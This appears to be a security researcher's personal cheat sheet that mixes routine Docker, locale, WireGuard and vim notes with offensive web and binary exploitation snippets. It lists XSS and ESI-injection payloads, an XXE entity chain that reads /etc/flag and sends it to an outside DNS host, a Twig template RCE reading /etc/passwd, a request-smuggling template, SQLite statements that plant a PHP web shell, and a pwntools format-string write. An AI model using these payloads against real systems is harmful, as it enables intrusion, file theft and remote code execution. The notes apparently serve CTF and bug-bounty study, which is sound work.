for my private purposes :)
- Burp Suite Professional
- Docker
- Ubuntu
- Web Applications Security
- Network
- /dev/null
- low-level
- IDA PRO
- Heap Exploitation
java -Xms10m -Xmx200m -XX:GCTimeRatio=19 -jar burp.jar --collaborator-server
Non-standard ports:
Configuration file: --collaborator-config=myconfig.config
- https://portswigger.net/burp/documentation/collaborator/deploying#running-on-non-standard-ports
- https://portswigger.net/burp/documentation/collaborator/deploying#collaborator-configuration-file-format
docker build -t name .
docker container prune
docker image prune
$ docker container stop $(docker container ls -aq)
$ docker container rm $(docker container ls -aq)
Show locales:
locale -a
Show default locales:
cat /etc/default/locale
Install polish locale:
sudo locale-gen pl_PL.utf8
Setup locales:
update-locale LANG=pl_PL.utf8
# Add:
sudo systemctl enable wg-quick@wg0.service
sudo systemctl daemon-reload
# Run:
sudo systemctl start wg-quick@wg0
# Check status:
systemctl status wg-quick@wg0
Some helpful payloads caught in the wild
<svG x=1 onload=(co\u006efirm)``//
<embed src=//14.rs>
<marquee loop=1 width=0 onfinish=confirm(1)>
<marquee/onstart=alert(1)>
<esi:include src="http://abcdef.burpcollaborator.net/" /><script>alert(1)</script>
<svg><a><rect width=100% height=100% /><animate attributeName=href to=javascript:alert(document.location)>
<svg><a><animate attributeName=href to=javascript:alert(document.location) /><text y=15>Click me!</text></a>
dtd file without .dtd extension (test.html):
<!ENTITY % file SYSTEM "file:///etc/flag">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://%file;.b0f4f2d1d89d4ec413ad.d.zhack.ca'>">
%eval;
%exfiltrate;
Injection:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///tmp/test.html"> %xxe;]>
SVG LFI (ImageMagick):
https://blog.bushwhackers.ru/googlectf-2019-gphotos-writeup/
<?xml version="1.0" encoding="UTF-8"?>
<svg width="1200px" height="1200px">
<image width="1200" height="1200" href="text:/etc/hosts" />
</svg>
Edge Side Include Injection
WAF'alike bypass:
<svg<!--esi--> onload=aler<!--esi-->t<!--esi-->``
he<!--esi-->llo -> hello
but
he<!--esx-->llo isn't modified
you have ESI injection
<esi:include src="/anypage.html" dca="none" />
XSS
<esi:include src="http://abcdef.burpcollaborator.net/" /><script>alert(1)</script>
- https://twitter.com/alxbrsn/status/981256374230319112
- https://t.co/XRxIalWcng?amp=1
- https://t.co/vzRIo3RuaR?amp=1
- https://www.slideshare.net/cisoplatform7/edge-side-include-injection-abusing-caching-servers-into-ssrf-and-transparent-session-hijacking
Twig3 RCE:
{{['cat${IFS}/etc/passwd']|filter('system')}}
TE.CL + Hackvertor
(disable “Update Content-Length” in Repeater && “Auto Update Content Length” in Hackvertor Settings)
POST / HTTP/1.1
Host: abc.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 3
<@chunked_dec2hex_4><@get_var_3 /><@/chunked_dec2hex_4>
<@set_var_1><@length_2>GPOST / HTTP/1.1
Host: abc.com
Content-Length: 15
x=1<@/length_2><@/set_var_1>
0
JSON escape:
<@python_4("import json;output = json.dumps(input)","7d808063a7c69f9dad4f4a3cb1c2bd1a")>test123'<>"<@/python_4>
Result: "test123'<>\""
Connect:
$ sqlite3 test.db
Command execution:
ATTACH DATABASE '/var/www/html/y.php' AS y;--
CREATE TABLE y.p (dataz text);--
INSERT INTO y.p (dataz) VALUES ('<? system($_GET[''cmd'']);?>');--
SELECT * FROM sys.x$schema_flattened_keys;
Blind SQL Injection without in:
https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952
// After Upload:
echo (new finfo)->file($_FILES["fileToUpload"]["tmp_name"]);
//Rendered:
JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, comment: "AAAAAAAAAAAAAAAAAA"
/*
Uploaded file:
$ cat test1234.txt | base64
/9j/4AAQSkZJRgABAgAAAQABAAD//kFBQUFBQUFBQUFBQUFBQUFBQUFB
*/
- RCE Telerik https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui?utm_campaign=190101_Posts_Blog&utm_source=Caleb%20-%20Github
- https://github.com/noperator/CVE-2019-18935
- https://github.com/Illuminopi/RCEvil.NET/
route get 192.168.13.14
while true; do
echo -e "HTTP/1.1 200 OK\n\n $(date)" | nc -l -p 1500 -q 1
done
:set background=dark
permanently:
echo 'set background=dark' >> $HOME/.vimrc
:set number
:set mouse=a
/Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli --stop
/Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli --config
/Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli --start
Check your current status:
/Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli --status
ldd --version
>>> hex(-199703103 & (2**32-1)) # 32-bit
'0xf418c5c1L'
>>> hex(-199703103 & (2**64-1)) # 64-bit
'0xfffffffff418c5c1L'
$ ldd -r -v aerofloat
linux-vdso.so.1 (0x00007ffce8bf5000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcbeeced000)
/lib64/ld-linux-x86-64.so.2 (0x00007fcbef0de000)
Version information:
./aerofloat:
libc.so.6 (GLIBC_2.7) => /lib/x86_64-linux-gnu/libc.so.6
libc.so.6 (GLIBC_2.2.5) => /lib/x86_64-linux-gnu/libc.so.6
/lib/x86_64-linux-gnu/libc.so.6:
ld-linux-x86-64.so.2 (GLIBC_2.3) => /lib64/ld-linux-x86-64.so.2
ld-linux-x86-64.so.2 (GLIBC_PRIVATE) => /lib64/ld-linux-x86-64.so.2
p = process('./aerofloat', env = {'LD_PRELOAD' : './libc.so.6 ./ld-linux-x86-64.so.2'})
puts@plt(puts@got)
puts@plt:
0x0000000000401030 <+0>: jmp QWORD PTR [rip+0x2fe2] # 0x404018
0x040430(*0x04018),
0x04018 = 0x7f......
>>> struct.pack("<L", 0x401192).decode()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
e.g.: (https://docs.python.org/3/howto/unicode.html)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0x92 in position 0: invalid start byte
>>> struct.pack("<L", 0x401192).decode("utf-8", "backslashreplace")
'\\x92\x11@\x00'
handle SIGHUP noprint nostop pass
set follow-fork-mode command controls the behavior of GDB when the debugged program calls fork() or vfork()
set follow-fork-mode parent
set follow-fork-mode child
show follow-fork-mode
pwndbg> dumpargs
format: 0xffffdb2c ◂— 'test\n'
vararg: 0x20
pwndbg> xinfo 0x80490a0
Extended information for virtual address 0x80490a0:
Containing mapping:
0x8049000 0x804a000 r-xp 1000 1000 /mnt/hgfs/LEARN/xx/binary/binary
Offset information:
Mapped Area 0x80490a0 = 0x8049000 + 0xa0
File (Base) 0x80490a0 = 0x8048000 + 0x10a0
File (Segment) 0x80490a0 = 0x8049000 + 0xa0
File (Disk) 0x80490a0 = /mnt/hgfs/LEARN/xx/binary/binary + 0x10a0
Containing ELF sections:
.plt.got 0x80490a0 = 0x80490a0 + 0x0
pwndbg> search -t pointer 0x804b398
binary 0x8048394 0x804b398
binary 0x80490a2 cwde
[heap] 0x8e76570 0x804b398
[heap] 0x8e76574 0x804b398
[stack] 0xffa8007c 0x804b398
[stack] 0xffa80080 0x804b398
>>> from pwn import *
>>> fmtstr_payload(71, {0x804b398: 0x38}, write_size='byte')
b'%56c%74$naaa\x98\xb3\x04\x08'
To prevent 00 00 in case write_size as above:
b'%56c%74$hhna\x98\xb3\x04\x08'
- https://www.hex-rays.com/products/ida/support/freefiles/IDA_Pro_Shortcuts.pdf (IDA PRO shortcuts)
- https://www.unknowncheats.me/wiki/How_to_use_IDA_Pro_efficiently (How to use IDA PRO efficiently)
- https://malwareunicorn.org/workshops/idacheatsheet.html (IDA PRO cheatsheet)
- After tcache is filled, the free memory is placed in fastbin or unsorted bin as before. (https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/implementation/tcache/)
tcache bins can only hold 7 entries at a time. (https://drive.google.com/file/d/1XpdruvtC1qW0OKLxO8FaqU9XCl8O_SON/view)